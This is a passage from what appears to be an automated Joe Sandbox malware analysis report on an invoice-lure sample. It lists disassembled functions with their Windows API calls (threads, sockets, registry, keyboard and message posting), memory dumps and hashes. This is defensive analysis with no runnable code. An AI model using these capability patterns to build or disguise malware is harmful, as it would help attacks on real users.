                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                              • String ID:
                              • API String ID: 2737351978-0
                              • Opcode ID: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                              • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                              • Opcode Fuzzy Hash: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                              • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 0041523A
                              • __calloc_crt.LIBCMT ref: 00415246
                              • __getptd.LIBCMT ref: 00415253
                              • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                              • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                              • _free.LIBCMT ref: 0041529E
                              • __dosmaperr.LIBCMT ref: 004152A9
                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                              • String ID:
                              • API String ID: 3638380555-0
                              • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                              • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                              • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                              • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 0046C96E
                                • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Variant$Copy$ClearErrorInitLast
                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                              • API String ID: 3207048006-625585964
                              • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                              • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                              • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                              • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                              APIs
                              • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                              • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                              • gethostbyname.WSOCK32(?), ref: 004655A6
                              • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                              • _memmove.LIBCMT ref: 004656CA
                              • GlobalFree.KERNEL32(00000000), ref: 0046575C
                              • WSACleanup.WSOCK32 ref: 00465762
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                              • String ID:
                              • API String ID: 2945290962-0
                              • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                              • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                              • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                              • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                              APIs
                              • GetSystemMetrics.USER32(0000000F), ref: 00440527
                              • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                              • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                              • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                              • String ID:
                              • API String ID: 1457242333-0
                              • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                              • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                              • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                              • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ConnectRegistry_memmove_wcslen
                              • String ID:
                              • API String ID: 15295421-0
                              • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                              • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                              • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                              • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                              APIs
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • _wcstok.LIBCMT ref: 004675B2
                                • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                              • _wcscpy.LIBCMT ref: 00467641
                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                              • _wcslen.LIBCMT ref: 00467793
                              • _wcslen.LIBCMT ref: 004677BD
                                • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                              • String ID: X
                              • API String ID: 780548581-3081909835
                              • Opcode ID: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                              • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                              • Opcode Fuzzy Hash: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                              • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                              APIs
                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                              • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                              • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                              • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                              • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                              • CloseFigure.GDI32(?), ref: 0044751F
                              • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                              • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                              • String ID:
                              • API String ID: 4082120231-0
                              • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                              • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                              • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                              • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                              • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                              • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                              • String ID:
                              • API String ID: 2027346449-0
                              • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                              • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                              • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                              • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                              • GetMenu.USER32 ref: 0047A703
                              • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                              • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                              • _wcslen.LIBCMT ref: 0047A79E
                              • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                              • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                              • String ID:
                              • API String ID: 3257027151-0
                              • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                              • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                              • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                              • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                              APIs
                              • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ErrorLastselect
                              • String ID:
                              • API String ID: 215497628-0
                              • Opcode ID: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                              • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                              • Opcode Fuzzy Hash: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                              • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                              APIs
                              • GetParent.USER32(?), ref: 0044443B
                              • GetKeyboardState.USER32(?), ref: 00444450
                              • SetKeyboardState.USER32(?), ref: 004444A4
                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessagePost$KeyboardState$Parent
                              • String ID:
                              • API String ID: 87235514-0
                              • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                              • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                              • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                              • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                              APIs
                              • GetParent.USER32(?), ref: 00444633
                              • GetKeyboardState.USER32(?), ref: 00444648
                              • SetKeyboardState.USER32(?), ref: 0044469C
                              • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                              • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                              • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                              • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessagePost$KeyboardState$Parent
                              • String ID:
                              • API String ID: 87235514-0
                              • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                              • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                              • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                              • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                              APIs
                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                              • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                              • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                              • DeleteObject.GDI32(?), ref: 00455736
                              • DeleteObject.GDI32(?), ref: 00455744
                              • DestroyIcon.USER32(?), ref: 00455752
                              • DestroyWindow.USER32(?), ref: 00455760
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                              • String ID:
                              • API String ID: 2354583917-0
                              • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                              • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                              • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                              • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
